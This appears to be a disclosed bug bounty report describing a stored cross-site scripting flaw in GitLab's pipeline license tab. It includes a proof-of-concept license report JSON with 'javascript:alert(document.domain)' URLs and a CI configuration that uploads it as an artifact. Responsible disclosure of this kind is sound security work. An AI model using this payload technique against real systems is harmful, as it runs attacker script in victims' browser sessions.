Stored XSS on Pipeline License Tab
Link: https://hackerone.com/reports/414341
By: @ngalog
Details: Summary: License Management Accept external URL clicking, and that URL accept any schema, such as javascript. It allows attacker to perform XSS on user when browsing pipelines license management tab.
Quick PoC
Visit https://gitlab.com/golduserngalog/bugbountyref/pipelines/31196139/licenses Click MIT, click URL, alert box will show up
Steps To Reproduce:
Fork https://gitlab.com/golduserngalog/bugbountyref/ and trigger CI/CD And visit the pipeline to look for the license and click license tab and click URL
Why
Because when the file uploaded as artifacts, the url didn't escape the schema properly
file name: gl-license-management-report.json
{
"licenses": [
{
"count": 1,
"name": "GNU Affero General Public License v3"
},
{
"count": 1,
"name": "MIT"
}
],
"dependencies": [
{
"license": {
"name": "GNU Affero General Public License v3",
"url":"javascript:alert(document.domain)"
},
"dependency": {
"name": "freeze",
"url": "https://github.com/adfinis-sygroup/freeze",
"description": "Freeze - dump / hash / sort / compare / diff anything",
"pathes": [
"."
]
}
},
{
"license": {
"name": "MIT",
"url": "javascript:alert(document.domain)"
},
"dependency": {
"name": "six",
"url": "http://pypi.python.org/pypi/six/",
"description": "Python 2 and 3 compatibility utilities",
"pathes": [
"."
]
}
}
]
}
Also, this file alone won't trigger the license tab, you will need the upload this file as artifacts as well.
PoC .gitlab-ci.yml
image: "alpine"
a:
script:
- echo "scddript"
- echo "a"
cache:
key: "yoyaoyoasdf"
policy: push #or push if you like to poison
paths:
- .
license_management:
image: docker:stable
stage: test
variables:
DOCKER_DRIVER: overlay2
allow_failure: true
services:
- docker:stable-dind
script:
- export LICENSE_MANAGEMENT_VERSION=$(echo "$CI_SERVER_VERSION" | sed 's/^\([0-9]*\)\.\([0-9]*\).*/\1-\2-stable/')
- docker run
--volume "$PWD:/code"
"registry.gitlab.com/gitlab-org/security-products/license-management:$LICENSE_MANAGEMENT_VERSION" analyze /code
- cat gl-license-management-report.json
artifacts:
paths: [gl-license-management-report.json]
Impact
Stored XSS